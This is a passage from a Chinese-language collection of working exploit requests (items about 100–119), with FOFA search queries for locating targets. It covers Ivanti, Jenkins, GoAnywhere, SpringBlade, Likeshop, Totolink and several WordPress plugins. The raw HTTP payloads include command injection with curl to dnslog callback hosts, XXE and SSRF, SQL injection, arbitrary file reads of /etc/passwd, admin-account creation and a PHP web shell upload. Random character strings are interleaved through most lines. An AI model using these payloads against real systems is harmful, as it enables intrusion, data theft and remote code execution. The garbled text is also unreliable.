% \0 ^# ]1 H4 e6 qFOFA:app="Ncast-产品" && title=="高清智能录播系统"
8 z4 y/ i/ E7 \3 }; G& }) wPOST /classes/common/busiFacade.php HTTP/1.1! M8 J) n, Y ^. G# _& M, b
Host: 192.168.40.130:8080
+ @3 N3 v9 }. o( sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( a3 k5 M; l3 H
Connection: close) @) r+ H& y/ v- Q
Content-Length: 154
- Q2 D9 n$ a+ kAccept: */*
8 n5 u( C2 {8 B/ c; G6 D: AAccept-Encoding: gzip, deflate
! A% e b6 |. @2 R) Q/ KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& o% H6 a9 b' m e, xContent-Type: application/x-www-form-urlencoded; charset=UTF-8' P8 O2 \9 D/ T1 v; E8 q
X-Requested-With: XMLHttpRequest% s/ C) ]3 N1 l" N1 ]$ D! B
2 l* n2 p; f: L' I7 _
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D0 V7 z/ ~! z* ^5 [. s) R' A
( u4 ^% a. g5 ^+ r
: {) B a V4 v* o100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
% N; Z- E" h% [7 r A. i( eCVE-2024-0352
9 a2 r9 d1 H0 Q ], jFOFA:icon_hash="874152924"& T, S# V/ ^) S/ }: x8 }( d
POST /api/file/formimage HTTP/1.1
- i4 r m0 S% hHost: 192.168.40.130$ ~% y1 r7 g X$ E
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36$ \5 @$ B x$ S# J
Connection: close0 c" l& Z5 x5 t7 O4 Y# H2 y$ j* ^/ o
Content-Length: 201
" g% m$ F8 K9 W+ |: A WContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
3 D7 b0 S1 J& ~$ J; ^+ ]Accept-Encoding: gzip
3 k0 ?8 Q2 X/ b4 [
) h9 @$ r( h5 P" V3 R------WebKitFormBoundarygcflwtei: k5 g$ u. {& `0 ]
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
6 U$ n7 v( F2 B# \Content-Type: application/x-php
( N" R# ~( d2 y* T3 C! Q b
, @9 c, [0 F' W9 q2ayyhRXiAsKXL8olvF5s4qqyI2O
' d- k4 n9 ?1 z. n( f' Q------WebKitFormBoundarygcflwtei--
8 Z: M7 p7 i8 I! L- g# H2 E* R3 }
t$ w) t4 [ ]& U$ _/ G+ [ r3 O101. ivanti policy secure-22.6命令注入9 W2 G9 A* S4 f* z7 U, u; D6 N+ C" B' X
CVE-2024-21887% N' O4 c+ A4 \6 f9 B
FOFA:body="welcome.cgi?p=logo"; o3 c) `" g+ h! N! Z) {' U
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
/ H/ {: f& X- K% A3 oHost: x.x.x.xx.x.x.x. k- n7 o& v% W/ N) p
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
k0 ?$ ]+ H7 e: h; G, A2 gConnection: close
) A Q! }, l$ u! e9 ]+ r# [0 h9 W ^8 @Accept-Encoding: gzip0 B/ E- j" Y L W- O
) a( w& M5 q2 x$ W( T, F
/ ~8 b: d0 c0 n1 [3 }
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
( I% p' u, g! F0 i6 }5 V& x/ F" lCVE-2024-21893- z7 Y4 u3 I$ z) [; W
FOFA:body="welcome.cgi?p=logo"
' p* ?7 P1 c! ^. E: \/ t9 gPOST /dana-ws/saml20.ws HTTP/1.1
. j8 x; I* W5 q# QHost: x.x.x.x0 T l/ Q" g' H6 r! d( d1 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 s8 \: y: I; i1 f5 }' wConnection: close. T) B1 q' I6 K I W
Content-Length: 792% p$ N. z3 E* s( z" w/ }; s
Accept-Encoding: gzip
- f+ E3 Y& G7 Q* D2 t/ x1 P) F. W$ I, f2 _# c6 Z% q
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
" n( O5 B6 ?8 m& [+ R' a9 _3 w i% ~! h2 s/ v
103. Ivanti Pulse Connect Secure VPN XXE. M2 @4 B H5 d/ @$ O, _! X' [
CVE-2024-22024& h1 x& r1 p8 @' I3 v& F
FOFA:body="welcome.cgi?p=logo". K: V2 D% n G9 \4 d* b8 l
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
# \) S! U5 x8 u* X& tHost: 192.168.40.130:111
) r1 P" d$ V2 r' t1 Y) c* CUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" [3 V) p) n$ N: z8 C# A3 U6 J
Connection: close
& Q2 m* s8 w' x, l. mContent-Length: 204; ~3 C, f4 t# ~; @* p; g
Content-Type: application/x-www-form-urlencoded% a7 a; C/ O7 o
Accept-Encoding: gzip
/ y8 l- u% v9 b2 o6 B* P2 W' L/ X* N' `5 h
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
/ V0 ?+ e4 B# S5 |% Y: s1 f1 z/ n8 g7 F) _0 k% R& M
8 W; K3 n1 {( H* I, D
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
# `% H, y f! ~4 a<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
! ]0 i5 q; m9 R% J! [) Y& i C! \/ `1 ^( u, o
8 {( v8 \8 \( y& l- Z, c
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露5 f$ y/ ?% ~ Y5 [
CVE-2024-0569
" \, ]0 I. i" A! NFOFA:title="TOTOLINK"
3 G) Y& R# S2 Z- [POST /cgi-bin/cstecgi.cgi HTTP/1.1 [5 `" u. p1 c0 H" I8 C
Host:192.168.0.1
. N# W3 Y2 u5 [% \ PContent-Length:41) J( ^& c8 m6 ]7 U3 E
Accept:application/json,text/javascript,*/*;q=0.01
$ |! l- R" Q) ]X-Requested-with: XMLHttpRequest8 e0 z8 a) Y8 W, V: r
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
. A% Y( r+ g' S8 J0 K r+ ^Content-Type: application/x-www-form-urlencoded:charset=UTF-80 E6 o& A+ z9 x3 e @9 [
Origin: http://192.168.0.1- C. J O6 }. Y( A
Referer: http://192.168.0.1/advance/index.html?time=1671152380564; }1 c. t7 N, B; b" G7 j7 g. k( U' }
Accept-Encoding:gzip,deflate" @' k1 z: K* J9 P2 ?1 N! O( n% X
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
1 z8 e$ O. k; W" H* A; a( IConnection:close
1 G" [ q+ |4 [9 I) o' t
& E( d- @; D* A0 A; I{, d! y" D$ J5 Z# h0 s
"topicurl":"getSysStatusCfg",. _ m" v$ g6 M+ q3 ~# z; i
"token":""
. d7 s( `. k: q0 P0 M- ?" I}# B% Y+ C( }, ? |! O2 T, D
' S0 |! J$ X( P# [1 H) i
105. SpringBlade v3.2.0 export-user SQL 注入$ U9 T. z5 V3 ?3 d J% o0 h# }2 v! t
FOFA:body="https://bladex.vip") A8 Z! T2 a; r) x
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
9 z, V1 w% Y$ L! Y: T$ F6 S
( ^8 d% f; s6 J; B! u4 N$ C106. SpringBlade dict-biz/list SQL 注入
$ c% W7 ?$ Z# T! K2 UFOFA:body="Saber 将不能正常工作"
7 _1 \$ v2 F8 fGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1- I. I: M8 ~1 c5 Y9 u- i1 R; h
Host: your-ip
: I& ^. ?! E9 ?: C6 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ d; t6 H1 w9 k- d& ]: f* N! E
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A( V6 f' |& H; E$ a3 K
Accept-Encoding: gzip, deflate6 @9 Y8 T5 e6 P- a6 m8 O x
Accept-Language: zh-CN,zh;q=0.9
# O/ S- ?7 q" n' Y; CConnection: close! ]$ s( w' _2 O2 b4 I5 ?6 y6 n) s
2 t; H3 _. w. a0 k& U& F: a# K$ @" [$ F6 S% ?
107. SpringBlade tenant/list SQL 注入& i& Y8 l U6 X' O% n3 C5 Y$ f
FOFA:body="https://bladex.vip"
! A9 |$ t8 W) c4 aGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1& Z& B* {" j) ?- B5 f5 k6 v
Host: your-ip/ \4 J0 D: G( \7 F; G$ h$ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, @) r2 g; m) z' a1 o$ v1 I7 [Blade-Auth:替换为自己的
' l3 Q1 ^9 e) c* {' Z+ j6 bConnection: close
* o( A* } Y! }, d, ~) Z
; x7 @8 t* n3 K! m' X3 v7 `8 a/ [1 p. i! T x
108. D-Tale 3.9.0 SSRF
6 M9 V: V0 P6 `4 I4 c8 uCVE-2024-216426 o) h0 |# S9 G/ p8 l- }
FOFA:"dtale/static/images/favicon.png"
8 m5 \5 o& Z/ s* ~6 ]. ~GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.10 V J2 j& y5 W, S4 n
Host: your-ip
7 i u3 _6 I9 P, W6 K, ~Accept: application/json, text/plain, */*1 ]2 n- C+ o! I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& T$ I. P' }) y, l e! c: K1 Z& M
Accept-Encoding: gzip, deflate
9 f7 l2 V) {1 F. uAccept-Language: zh-CN,zh;q=0.9,en;q=0.87 Y; i, @: w u" X
Connection: close& j( b0 p. Q8 H/ w& n G
( V8 T7 j7 p( f8 B
, ], E$ N6 v: ?, b" ]/ N9 c4 A# i109. Jenkins CLI 任意文件读取
1 k( ]' z2 U' a8 H7 yCVE-2024-23897
2 c7 F0 T# j( a( OFOFA:header="X-Jenkins"
0 K" c$ |) G3 L; Q# }- X: ^POST /cli?remoting=false HTTP/1.1
6 \$ |+ I8 n$ |5 Q0 DHost:# u! A4 C3 y7 J" l: f
Content-type: application/octet-stream x% C, d( i3 t1 Y4 s# }0 A& I( _" e
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e929 M' ?# b- q' G8 h
Side: upload
$ n8 N) G$ j* vConnection: keep-alive
. P5 R) e4 E" r w3 L* wContent-Length: 163
+ s( J( s* R5 j
E y4 t" d2 v! s( Qb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'7 Y9 i. W i+ g( h' J! V
( d, L/ N/ R! j. z6 p/ ^1 b) J
% w: N x# N0 Z& |, U
POST /cli?remoting=false HTTP/1.1; z- W' J- k; D6 y
Host:' ]5 @; ~: g* f0 B
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
" C: _! _4 K6 u2 H" j' I0 i0 adownload1 ~! O$ B& K+ a" y8 M4 \4 L
Content-Type: application/x-www-form-urlencoded7 ~: ?' w* w6 S, j+ F7 ~5 ]
Content-Length: 0
! T/ L I: M7 K' y, i% M+ p8 {# |
( m4 g% B" h) Z) M ^5 Y. L- T! L5 `0 I6 T6 T( r
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
4 u( F2 B! ]# T# i) |- \. Ijava -jar jenkins-cli.jar help
/ t$ a2 E6 g7 g* h1 e5 ~& Y[COMMAND]& j- m3 A/ b5 R6 K' b7 x
Lists all the available commands or a detailed description of single command.
/ v+ y/ T* z. d$ @& L COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
' F9 E) h+ \. ~1 M
; e5 c( {- E0 @, g/ h6 I! U9 z$ }1 N+ u% I% B7 f/ x+ Y1 E1 \
110. Goanywhere MFT 未授权创建管理员6 n8 U! W0 d; j6 I! T, G
CVE-2024-0204$ Y" t P( c5 x G$ D! b
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"0 \% Q/ s. b8 w6 ^: g- [+ a+ z& Y
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
1 U+ O) v8 f: J. G2 L8 v/ CHost: 192.168.40.130:8000
$ i- A* j4 r& I& n5 |7 i$ EUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
d9 I9 d# j/ ~, q! B! ~Connection: close
/ d0 t$ V! {- U+ d" ]6 L3 GAccept: */*. `! _9 @: Z% f
Accept-Language: en3 V3 V5 F) A) t- `
Accept-Encoding: gzip. ^3 c9 U$ Y( ~* f) _, |2 N
# O* M% ^5 k- w- r& k
; B9 g3 x' C7 _+ f: p* y" I
111. WordPress Plugin HTML5 Video Player SQL注入
: v0 |- e: m0 c. D0 m9 JCVE-2024-1061
: ~: G/ v- u$ \* q3 z% p% O1 K$ h- F1 ]FOFA:"wordpress" && body="html5-video-player"5 p5 o H+ f8 \
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1+ C) x1 ~. S) c) b
Host: 192.168.40.130:112& k% s/ _2 ~& {! G6 f2 B
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" g) h' }, P4 O. l3 A, L
Connection: close
2 [) u, w0 M5 W4 s/ T( k2 G/ qAccept: */*5 r- h2 B' x. B5 }
Accept-Language: en6 r# B# Y, Z4 T1 X! S
Accept-Encoding: gzip; e. {. r! S5 n' x5 k* c( v& @
' H1 Q' U) ~! r/ B/ i
8 W) X: t; R' c7 G6 H9 D, M112. WordPress Plugin NotificationX SQL 注入
; T- D9 y/ ^3 {, m, `, [CVE-2024-1698, \+ b3 M* k9 E( g4 g
FOFA:body="/wp-content/plugins/notificationx"8 L& ~( J9 j* j- l/ x- G% J
POST /wp-json/notificationx/v1/analytics HTTP/1.1
; P, W( F) {7 D3 V: yHost: {{Hostname}}5 |* ^! W6 B2 b0 K& F; Y2 j' U1 `
Content-Type: application/json/ |' o' v6 U* g5 g. c. V, c
: Q1 |, o5 M' m g9 S' T" o* T
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}# H; t a: y8 l& i7 f' v0 z
3 i* z' `0 E- h2 ~
$ q3 J$ [/ \) h& V. }) a- M
113. WordPress Automatic 插件任意文件下载和SSRF
L- x7 i' z o- q- Y, w7 K$ I. `CVE-2024-279548 y$ b* d6 Z$ J$ I4 U0 @! q' }
FOFA:"/wp-content/plugins/wp-automatic"
! y' L- O/ g% I. T$ A' {GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
/ v) A; P6 _0 v) e/ L8 R" bHost: x.x.x.x# E2 c) Z& P% \) d! f |9 U5 S
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36. n" {- L2 x* i5 K" n \3 a3 e
Connection: close
; o1 t1 ?. Y9 mAccept: */*
5 J: P" w' b" o) ]4 }" G- vAccept-Language: en
) J* m+ i+ ^% Z# {Accept-Encoding: gzip. p" U' r; g2 P5 S
( P; R1 c- j1 v. F( d2 F5 D
! T% P$ a% |/ z0 s. n' m2 }114. WordPress MasterStudy LMS插件 SQL注入
7 C( c0 I) i7 t$ Y. h6 Q7 gFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"! q6 z( E" E# o
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
. r% C# @1 F" yHost: your-ip8 J* u/ T. h9 N# B! @# n
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
4 q' `5 ^. G( Q# X$ YAccept-Charset: utf-8. R2 ]( M$ h% X: x; Z* @
Accept-Encoding: gzip, deflate
3 `, G, A: {9 CConnection: close
% P9 u7 G' s4 }# a r9 S
6 a& o1 d% _8 d* o" F ~6 ~- t ?" A+ t* O+ X
115. WordPress Bricks Builder <= 1.9.6 RCE" G2 j1 h4 x* R' v; l
CVE-2024-25600+ s/ {' a6 c$ I1 M
FOFA: body="/wp-content/themes/bricks/"
; e) f( E% s; R8 ^8 Z# W3 M第一步,获取网站的nonce值
8 R$ X8 e, i, H3 x$ ~% `. iGET / HTTP/1.15 f) D' f& K2 f0 q. h/ ?
Host: x.x.x.x
$ f6 y4 O% H1 `$ UUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
4 E5 W9 m S# V6 ?- LConnection: close! }9 {' I. N7 W
Accept-Encoding: gzip
( f8 o) y9 _, V8 S1 T5 g
! E5 L; T r3 m+ y6 \1 I9 C8 L/ {0 b4 p. o& C) T3 a
第二步替换nonce值,执行命令
8 o2 W( u" c) z" N7 FPOST /wp-json/bricks/v1/render_element HTTP/1.1
6 {8 F( r" N9 T) Z8 Z" h) kHost: x.x.x.x
4 P+ z1 d" q; H% K) ~2 j1 D8 M7 Y2 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 R5 p1 V+ ~3 L& b
Connection: close9 E# E& n6 y! z# V' @8 J$ @
Content-Length: 356 s- `3 [0 M* V% F
Content-Type: application/json- C1 z( p( x/ y( m
Accept-Encoding: gzip
@3 b" P. K, D4 y1 {
( s7 ?* A/ ~7 `2 U4 T% U{! ?' @: V" |, T+ ^. H
"postId": "1",
& `, }) n" J& t) Z: V2 X6 S "nonce": "第一步获得的值",
; R; C; ?% }% P# _. l "element": {$ [# M% a+ _+ d* Q& R# N {# t1 E; `( C
"name": "container",9 j. _4 V' Q0 q4 `! L1 Z A
"settings": {
3 R) ?/ e, p) M/ j, C2 k8 w "hasLoop": "true",
8 P6 n. {3 B: w/ n" x# x% a "query": {
0 a; N" R. R6 J8 E+ u "useQueryEditor": true,
1 x, b1 c* j: d- O3 _ "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
4 v4 e" m0 Q v- Y "objectType": "post"( F2 q3 t) Z7 e7 v
}
: c7 V* Y$ o, y. ? }
. F5 c r* U. s& i }
+ G1 U/ A1 m. i! h, l5 v}
: i1 f3 L T- S2 O, r3 e7 ^7 q& F( F2 k: V
3 `5 V$ Q5 A( k0 l( A5 `+ B116. wordpress js-support-ticket文件上传1 {( J9 E H# z+ {
FOFA:body="wp-content/plugins/js-support-ticket"
1 L' H1 n5 o& B0 EPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
. i1 q0 R1 O, x/ P- h1 Z" n5 pHost:+ u% h; E: D! a- u0 T7 S
Content-Type: multipart/form-data; boundary=--------7670991719 s d/ W1 o. F% G
User-Agent: Mozilla/5.0
~- M# I0 w) \1 W ?, ]$ ^- t' R4 s6 n; O) U$ Q8 T
----------767099171$ [/ B9 B$ l% n p: b6 \, h4 l
Content-Disposition: form-data; name="action"
! d' b( a$ ~) o* ]! O' s3 a0 wconfiguration_saveconfiguration
: p. G0 \0 o5 H; A0 R q0 d----------767099171" L' y$ C( J% Y7 c
Content-Disposition: form-data; name="form_request"
# w0 {8 w, G5 O6 fjssupportticket
1 _" K0 J, ^' A0 i7 c----------767099171
0 ^! L0 G1 \+ O, k8 m0 N1 d! |Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
2 t" m. M" m, K z& xContent-Type: image/png
1 n6 R# \$ ^1 B. \) j6 t* t' L----------767099171--* `/ {" R9 @7 B$ U" u. r6 V
0 N) ]7 C0 |9 G1 x+ t
( E/ P( s/ ^! H& Y: Q117. WordPress LayerSlider插件SQL注入
( b3 a) |" i& |( F* n2 n0 Y8 wversion:7.9.11 – 7.10.0
, v8 [( C6 ]& }4 wFOFA:body="/wp-content/plugins/LayerSlider/"1 ^2 W0 a) D! a; J* E5 Z, [
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1; C* g9 N8 a3 B/ o' F( ?8 Z" O. p( Z5 d
Host: your-ip0 h$ z( r7 V! [) M# s' j8 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 [0 W+ w: h: ~# qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 c4 Y5 `, G. ?2 N2 ~+ C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 o: E: q: C( F: Y* @
Accept-Encoding: gzip, deflate, br
1 v* t t) X$ {( RConnection: close
- i! b4 d* S0 G# Z' l& h: rUpgrade-Insecure-Requests: 1
1 [' T! {! N2 J+ L1 }: g1 G% O* |6 p/ d; T! @: V4 L
! [ u- X7 Q6 I8 A
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
0 G& |* o8 i( y7 C+ W2 B, Z( y; S& OCVE-2024-0939
0 {. z: n+ {/ V7 v W6 S4 UFOFA:title="Smart管理平台"7 ^% n% J5 n. H) P* ]; P" J& A
POST /Tool/uploadfile.php? HTTP/1.1
9 }5 Z+ i( g9 pHost: 192.168.40.130:8443; P: q7 N; T2 s$ R5 }
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8% A; w) D, J$ N! E# W& }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
4 [5 h7 h' P* L3 o2 Z' h# v( b. @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, f- V5 @; b! a) @2 ]& O4 D; o5 E! n. w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! h5 \& P& E6 l; A( Y' M
Accept-Encoding: gzip, deflate
* B% m U- S5 K( K$ N1 s' w UContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
/ N/ ~" Q( c, n, _1 Z, aContent-Length: 405
7 |3 R* i- p6 @8 n* r ]% S; I0 L5 `Origin: https://192.168.40.130:8443% U' G P( s1 t9 W M) K* F* J3 S5 r% ^
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
: n" a% U" C7 i, `. G( W6 EUpgrade-Insecure-Requests: 1
1 N! P, L) ?4 p) P2 W2 dSec-Fetch-Dest: document) I' {- O2 y4 `8 [+ S
Sec-Fetch-Mode: navigate4 ?/ Z9 o3 l6 P; P7 ~9 r4 W! M
Sec-Fetch-Site: same-origin! ]8 g7 p! {" J& t
Sec-Fetch-User: ?1
% ?, \0 }# x+ k1 g+ vTe: trailers
. g6 t" l" U7 o6 u& A4 ?* ~, h) |' zConnection: close; }( w2 J+ C; \6 u' }* u
2 H5 r6 I8 Q2 C0 x1 W8 P
-----------------------------13979701222747646634037182887& a, [/ U" y3 e% L$ v1 Y
Content-Disposition: form-data; name="file_upload"; filename="contents.php"' D$ Y$ l5 F2 v+ @5 @: w; F l
Content-Type: application/octet-stream! a$ y' j2 B( V1 b" c& W+ t! c
" E+ K$ F" \$ I- l
<?php
6 u: ^# A: T% k- nsystem($_POST["passwd"]);8 O7 M7 Z+ V& N! H. S K( x$ U
?> G$ E6 m7 e' E; e/ Z% v6 G2 Q
-----------------------------139797012227476466340371828875 e/ a) `/ Q4 M1 A) T
Content-Disposition: form-data; name="txt_path"1 h |, s# l5 v. P3 U k$ M
5 G" [4 o6 M! I+ A) x+ a* {
/home/src.php
) r) Q: f$ Z/ C4 P- P-----------------------------13979701222747646634037182887--
" ?1 q: \) N2 J4 C, O1 O9 ~5 i# x" F. F2 [" h% [7 [; B
x( k8 g; q; A2 Q3 Z2 C访问/home/src.php
0 w% F1 B3 T# C O$ m
$ Y! p! [3 p2 j- Y119. 北京百绰智能S20后台sysmanageajax.php sql注入) N1 z7 M" H8 R
CVE-2024-1254% S4 m- _6 z1 d
FOFA:title="Smart管理平台"$ _# E) w1 i" I/ [
先登录进入系统,默认账号密码为admin/admin v0 V4 F0 Q g! _
POST /sysmanage/sysmanageajax.php HTTP/1.11
# {" K% M. o7 [ V# GHost: x.x.x.x
7 \3 Q0 A& [) z4 G* yCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
l. ?$ m2 P" H. N8 I5 L% t) z0 v9 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.02 y5 {& @, T/ m7 T
Accept: */*
" t5 k: H' C( u: Q9 L* a- h4 s9 BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 y; {) \) H" f4 U! AAccept-Encoding: gzip, deflate
/ N! b& Z6 w5 J, d$ T5 JContent-Type: application/x-www-form-urlencoded;6 n) Q; s2 |3 W+ v4 p; {
Content-Length: 109
* W) l) o3 H; q( \- L0 iOrigin: https://58.18.133.60:8443
( y4 m+ j2 B; A1 w8 l: xReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php- f0 t, i G1 w& h5 v1 D0 {9 K
Sec-Fetch-Dest: empty/ I: h4 j) T6 _9 @6 W3 X
Sec-Fetch-Mode: cors
* Z8 L( N1 }; `8 {Sec-Fetch-Site: same-origin
w8 K3 P. a" `8 BX-Forwarded-For: 1.1.1.12 L+ }$ G5 U$ i) z+ a B! t! D# I; ]
X-Originating-Ip: 1.1.1.11 M m! i1 ~7 S3 F3 C+ P
X-Remote-Ip: 1.1.1.1
/ L2 ~% F* L2 \. Z/ f: }* x2 h5 B7 WX-Remote-Addr: 1.1.1.15 H/ l) l, j! H E/ ^ H
Te: trailers
: \; q7 _" A% ]& G# G: hConnection: close
3 n# j% b% C* y) i, d4 b8 x4 v/ Q6 W9 [) ~ G% C$ |
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456# Z" ?, N6 }. o6 Y# v! |
, p/ V! t" N+ m+ L; n8 ]
